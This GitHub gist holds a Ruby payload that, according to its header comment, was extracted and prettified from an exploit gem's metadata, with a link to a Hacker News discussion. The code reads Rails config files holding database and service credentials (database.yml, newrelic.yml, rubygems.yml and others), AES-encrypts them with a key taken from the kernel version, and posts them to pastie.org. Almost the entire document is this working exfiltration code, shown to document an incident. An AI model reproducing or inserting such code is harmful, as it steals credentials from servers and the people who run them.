secret
Last active

  • Download Gist
rubygems_payload.rb
Ruby
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
# extracted and prettified from the exploit gem metadata (https://gist.github.com/d891e876c53e55bf0920)
# context: https://news.ycombinator.com/item?id=5139720
require 'net/http'
require 'digest'
require 'openssl'
require 'base64'
aes = proc { |text|
aes_256 = OpenSSL::Cipher.new('aes-256-cbc')
aes_256.encrypt
aes_256.key = Digest::MD5.hexdigest(`uname -r`)
 
crypted = aes_256.update(text)
crypted << aes_256.final
Base64.encode64(crypted)
}
exfil = proc { |path|
if File.file?(path) == true
"::: #{path} :::\n\n#{File.read(path)}"
end
}
loot = ["config/database.yml", "config/librato.yml", "config/newrelic.yml", "config/rubygems.yml"].map { |path| exfil.call(path) }.join
if !(loot.empty?)
Net::HTTP.post_form(URI('http://pastie.org/pastes'), {
'paste[authorization]' => 'burger',
'paste[access_key]' => '',
'paste[parse_id]' => '6',
'paste[body]' => "e193256c9337b50b197f040e762dafcc745a66297c9db47ac30395d8022f94a8\n\n#{aes.call(loot)}",
'paste[restricted]' => '0',
'commit' => 'Create Paste'
})
end

Please sign in to comment on this gist.

Something went wrong with that request. Please try again.